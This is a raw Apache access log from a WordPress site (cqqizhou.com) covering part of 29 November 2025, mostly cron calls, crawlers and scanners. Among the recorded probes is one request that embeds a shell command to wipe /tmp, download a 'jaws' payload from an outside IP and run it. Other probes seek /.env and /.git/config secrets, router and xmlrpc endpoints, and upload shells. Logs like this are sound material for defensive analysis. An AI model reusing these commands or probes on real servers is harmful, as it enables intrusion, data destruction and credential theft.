36.133.115.36 - - [29/Nov/2025:13:25:59 +0800] "POST /wp-cron.php?doing_wp_cron=1764393959.2650849819183349609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [29/Nov/2025:13:27:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764394025.3918950557708740234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:13:27:05 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Nov/2025:13:36:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764394565.0017960071563720703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
87.236.176.44 - - [29/Nov/2025:13:36:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.44 - - [29/Nov/2025:13:36:05 +0800] "GET / HTTP/1.1" 200 33988 "http://36.133.115.36" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
36.133.115.36 - - [29/Nov/2025:13:44:55 +0800] "POST /wp-cron.php?doing_wp_cron=1764395095.6251819133758544921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [29/Nov/2025:13:44:55 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [29/Nov/2025:13:44:56 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [29/Nov/2025:13:46:35 +0800] "POST /wp-cron.php?doing_wp_cron=1764395195.6339290142059326171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.130.74.193 - - [29/Nov/2025:13:46:35 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Nov/2025:13:53:06 +0800] "POST /wp-cron.php?doing_wp_cron=1764395586.9601140022277832031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
151.238.74.98 - - [29/Nov/2025:13:53:07 +0800] "GET / HTTP/1.1" 200 152189 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:14:07:28 +0800] "POST /wp-cron.php?doing_wp_cron=1764396448.8718750476837158203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
87.121.84.52 - - [29/Nov/2025:14:07:29 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [29/Nov/2025:14:24:53 +0800] "POST /wp-cron.php?doing_wp_cron=1764397493.9490149021148681640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
162.240.102.83 - - [29/Nov/2025:14:24:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0"
36.133.115.36 - - [29/Nov/2025:14:29:02 +0800] "POST /wp-cron.php?doing_wp_cron=1764397742.5254490375518798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
45.135.193.9 - - [29/Nov/2025:14:29:02 +0800] "GET http://ip-api.com/json/ HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
36.133.115.36 - - [29/Nov/2025:14:38:32 +0800] "POST /wp-cron.php?doing_wp_cron=1764398312.4576489925384521484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
149.50.96.133 - - [29/Nov/2025:14:38:33 +0800] "GET / HTTP/1.1" 200 109842 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:14:38:38 +0800] "POST /wp-cron.php HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [29/Nov/2025:14:38:38 +0800] "GET / HTTP/1.1" 200 33988 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [29/Nov/2025:14:38:38 +0800] "GET / HTTP/1.1" 200 33988 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [29/Nov/2025:14:38:38 +0800] "GET / HTTP/1.1" 200 33988 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [29/Nov/2025:14:54:34 +0800] "POST /wp-cron.php?doing_wp_cron=1764399274.1654999256134033203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:14:54:34 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Nov/2025:15:01:48 +0800] "POST /wp-cron.php?doing_wp_cron=1764399708.1304490566253662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.240.219.146 - - [29/Nov/2025:15:01:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.219.146 - - [29/Nov/2025:15:01:52 +0800] "GET / HTTP/1.1" 200 153877 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.219.146 - - [29/Nov/2025:15:01:58 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "-"
66.240.219.146 - - [29/Nov/2025:15:02:00 +0800] "GET /sitemap.xml HTTP/1.1" 200 2410 "-" "-"
36.133.115.36 - - [29/Nov/2025:15:04:26 +0800] "POST /wp-cron.php?doing_wp_cron=1764399866.0935730934143066406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
114.98.179.20 - - [29/Nov/2025:15:04:26 +0800] "GET /webmanage/handler/config.ashx HTTP/1.1" 404 8984 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:15:06:52 +0800] "POST /wp-cron.php?doing_wp_cron=1764400012.3057520389556884765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
175.6.217.4 - - [29/Nov/2025:15:06:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
175.6.217.4 - - [29/Nov/2025:15:06:56 +0800] "GET / HTTP/1.1" 200 33525 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Nov/2025:15:09:17 +0800] "POST /wp-cron.php?doing_wp_cron=1764400157.8629610538482666015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.91.110.210 - - [29/Nov/2025:15:09:17 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
95.91.110.210 - - [29/Nov/2025:15:09:19 +0800] "GET /portfolio-tag/%E9%9E%8D%E9%92%A2%E8%92%82%E6%A3%AE/ HTTP/1.1" 200 86573 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
95.91.110.210 - - [29/Nov/2025:15:09:21 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 78886 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
95.91.110.210 - - [29/Nov/2025:15:09:23 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 78548 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [29/Nov/2025:15:34:43 +0800] "POST /wp-cron.php?doing_wp_cron=1764401683.7325429916381835937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
148.153.56.58 - - [29/Nov/2025:15:34:43 +0800] "GET /Zh6d HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [29/Nov/2025:15:34:44 +0800] "GET /Zh6d HTTP/1.1" 404 8984 "http://36.133.115.36:80/Zh6d" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
36.133.115.36 - - [29/Nov/2025:15:34:46 +0800] "POST /wp-cron.php?doing_wp_cron=1764401686.2712719440460205078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
148.153.56.58 - - [29/Nov/2025:15:34:46 +0800] "GET /vEIY HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [29/Nov/2025:15:34:49 +0800] "GET /vEIY HTTP/1.1" 404 8983 "http://36.133.115.36:80/vEIY" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [29/Nov/2025:15:34:51 +0800] "GET /aab8 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [29/Nov/2025:15:34:52 +0800] "GET /aab8 HTTP/1.1" 404 8989 "http://36.133.115.36:80/aab8" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [29/Nov/2025:15:34:53 +0800] "GET /aab9 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [29/Nov/2025:15:34:54 +0800] "GET /aab9 HTTP/1.1" 404 8984 "http://36.133.115.36:80/aab9" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
114.119.128.102 - - [29/Nov/2025:15:35:27 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [29/Nov/2025:15:39:14 +0800] "POST /wp-cron.php?doing_wp_cron=1764401954.4215140342712402343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
167.94.146.63 - - [29/Nov/2025:15:39:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.63 - - [29/Nov/2025:15:39:39 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 8984 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [29/Nov/2025:15:40:27 +0800] "POST /wp-cron.php?doing_wp_cron=1764402027.2512021064758300781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
114.119.146.219 - - [29/Nov/2025:15:40:27 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [29/Nov/2025:15:46:21 +0800] "POST /wp-cron.php?doing_wp_cron=1764402381.2659099102020263671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.153.58.28 - - [29/Nov/2025:15:46:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.58.28 - - [29/Nov/2025:15:46:23 +0800] "GET / HTTP/1.1" 200 33526 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Nov/2025:16:00:59 +0800] "POST /wp-cron.php?doing_wp_cron=1764403259.8262999057769775390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
192.250.232.94 - - [29/Nov/2025:16:00:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
36.133.115.36 - - [29/Nov/2025:16:03:50 +0800] "POST /wp-cron.php?doing_wp_cron=1764403430.1977829933166503906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [29/Nov/2025:16:03:50 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [29/Nov/2025:16:03:51 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [29/Nov/2025:16:11:25 +0800] "POST /wp-cron.php?doing_wp_cron=1764403885.0722029209136962890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
180.153.236.223 - - [29/Nov/2025:16:11:25 +0800] "GET / HTTP/1.1" 200 33526 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36; 360Spider"
36.133.115.36 - - [29/Nov/2025:16:12:00 +0800] "POST /wp-cron.php?doing_wp_cron=1764403920.2126450538635253906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
184.94.240.88 - - [29/Nov/2025:16:12:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
184.94.240.88 - - [29/Nov/2025:16:12:03 +0800] "GET / HTTP/1.1" 200 153877 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
36.133.115.36 - - [29/Nov/2025:16:16:22 +0800] "POST /wp-cron.php?doing_wp_cron=1764404182.5278789997100830078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:16:16:22 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Nov/2025:16:19:58 +0800] "POST /wp-cron.php?doing_wp_cron=1764404398.4204530715942382812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
188.165.217.198 - - [29/Nov/2025:16:19:58 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
40.77.167.20 - - [29/Nov/2025:16:35:49 +0800] "GET /about/ HTTP/1.1" 200 24617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:16:50:13 +0800] "POST /wp-cron.php?doing_wp_cron=1764406213.1101720333099365234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
34.38.242.32 - - [29/Nov/2025:16:50:13 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
43.135.182.43 - - [29/Nov/2025:16:50:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.182.43 - - [29/Nov/2025:16:50:26 +0800] "GET / HTTP/1.1" 200 33526 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Nov/2025:17:07:52 +0800] "POST /wp-cron.php?doing_wp_cron=1764407272.7590820789337158203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
198.58.96.57 - - [29/Nov/2025:17:07:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0"
36.133.115.36 - - [29/Nov/2025:17:37:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764409025.5525178909301757812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
114.119.146.19 - - [29/Nov/2025:17:37:05 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [29/Nov/2025:17:45:12 +0800] "POST /wp-cron.php?doing_wp_cron=1764409512.6992690563201904296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:17:45:13 +0800] "GET / HTTP/1.1" 200 33524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Nov/2025:18:13:38 +0800] "POST /wp-cron.php?doing_wp_cron=1764411218.7244949340820312500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
74.7.241.46 - - [29/Nov/2025:18:13:38 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
36.133.115.36 - - [29/Nov/2025:18:28:13 +0800] "POST /wp-cron.php?doing_wp_cron=1764412093.8662610054016113281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.119 - - [29/Nov/2025:18:28:13 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.115.36 - - [29/Nov/2025:18:30:17 +0800] "POST /wp-cron.php?doing_wp_cron=1764412217.4297869205474853515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [29/Nov/2025:18:30:17 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [29/Nov/2025:18:30:18 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [29/Nov/2025:18:33:55 +0800] "POST /wp-cron.php?doing_wp_cron=1764412435.3444540500640869140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
161.35.158.4 - - [29/Nov/2025:18:33:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
36.133.115.36 - - [29/Nov/2025:18:59:36 +0800] "POST /wp-cron.php?doing_wp_cron=1764413976.3532860279083251953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [29/Nov/2025:18:59:37 +0800] "GET / HTTP/1.1" 200 152189 "-" "-"
36.133.115.36 - - [29/Nov/2025:19:01:36 +0800] "POST /wp-cron.php?doing_wp_cron=1764414096.4594700336456298828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
223.199.171.232 - - [29/Nov/2025:19:01:36 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Mobile Safari/537.36"
180.111.30.35 - - [29/Nov/2025:19:01:38 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Mobile Safari/537.36"
36.133.115.36 - - [29/Nov/2025:19:03:12 +0800] "POST /wp-cron.php?doing_wp_cron=1764414192.6850769519805908203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.191.171.13 - - [29/Nov/2025:19:03:12 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.209 - - [29/Nov/2025:19:03:18 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 17879 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [29/Nov/2025:19:04:14 +0800] "POST /wp-cron.php?doing_wp_cron=1764414254.6149721145629882812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
40.77.167.241 - - [29/Nov/2025:19:04:14 +0800] "GET /sitemap_index.xml HTTP/1.1" 404 8990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:19:13:10 +0800] "POST /wp-cron.php?doing_wp_cron=1764414790.2291638851165771484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:19:13:10 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.166.239.145 - - [29/Nov/2025:19:13:35 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
156.208.61.90 - - [29/Nov/2025:19:30:47 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 158.94.210.88/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [29/Nov/2025:19:30:48 +0800] "POST /wp-cron.php?doing_wp_cron=1764415848.5912899971008300781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [29/Nov/2025:19:39:46 +0800] "POST /wp-cron.php?doing_wp_cron=1764416386.2024281024932861328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
139.59.248.228 - - [29/Nov/2025:19:39:46 +0800] "GET /.env HTTP/1.1" 404 8983 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
139.59.248.228 - - [29/Nov/2025:19:39:47 +0800] "GET /.git/config HTTP/1.1" 404 8984 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [29/Nov/2025:19:44:36 +0800] "POST /wp-cron.php?doing_wp_cron=1764416676.5927450656890869140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
183.230.147.84 - - [29/Nov/2025:19:44:36 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
183.230.147.84 - - [29/Nov/2025:19:44:41 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
183.230.147.84 - - [29/Nov/2025:19:44:41 +0800] "GET /nmaplowercheck1764416679 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
183.230.147.84 - - [29/Nov/2025:19:44:41 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
183.230.147.84 - - [29/Nov/2025:19:44:41 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
183.230.147.84 - - [29/Nov/2025:19:44:41 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
36.133.115.36 - - [29/Nov/2025:19:44:51 +0800] "POST /wp-cron.php?doing_wp_cron=1764416691.1194539070129394531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
183.230.147.84 - - [29/Nov/2025:19:44:51 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
183.230.147.84 - - [29/Nov/2025:19:44:51 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
172.86.90.34 - - [29/Nov/2025:19:46:00 +0800] "GET /kickstart.php HTTP/1.1" 404 27 "-" "Python-urllib/2.7"
188.165.217.198 - - [29/Nov/2025:19:46:45 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22126 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [29/Nov/2025:19:49:37 +0800] "POST /wp-cron.php?doing_wp_cron=1764416977.2379410266876220703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
40.77.167.7 - - [29/Nov/2025:19:49:37 +0800] "GET /sitemaps.xml HTTP/1.1" 404 8984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:19:50:16 +0800] "POST /wp-cron.php?doing_wp_cron=1764417016.4105119705200195312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
5.183.189.74 - - [29/Nov/2025:19:50:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
36.133.115.36 - - [29/Nov/2025:20:04:03 +0800] "POST /wp-cron.php?doing_wp_cron=1764417843.1542959213256835937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
79.124.40.86 - - [29/Nov/2025:20:04:03 +0800] "HEAD / HTTP/1.0" 301 0 "-" "-"
36.133.115.36 - - [29/Nov/2025:20:15:45 +0800] "POST /wp-cron.php?doing_wp_cron=1764418545.4818370342254638671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
178.128.90.221 - - [29/Nov/2025:20:15:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.90.221 - - [29/Nov/2025:20:15:46 +0800] "GET / HTTP/1.1" 200 33988 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.90.221 - - [29/Nov/2025:20:15:48 +0800] "GET /form.html HTTP/1.1" 404 8990 "-" "curl/8.1.2"
178.128.90.221 - - [29/Nov/2025:20:15:48 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
178.128.90.221 - - [29/Nov/2025:20:15:49 +0800] "GET /t4 HTTP/1.1" 404 8990 "-" "Mozilla/5.0"
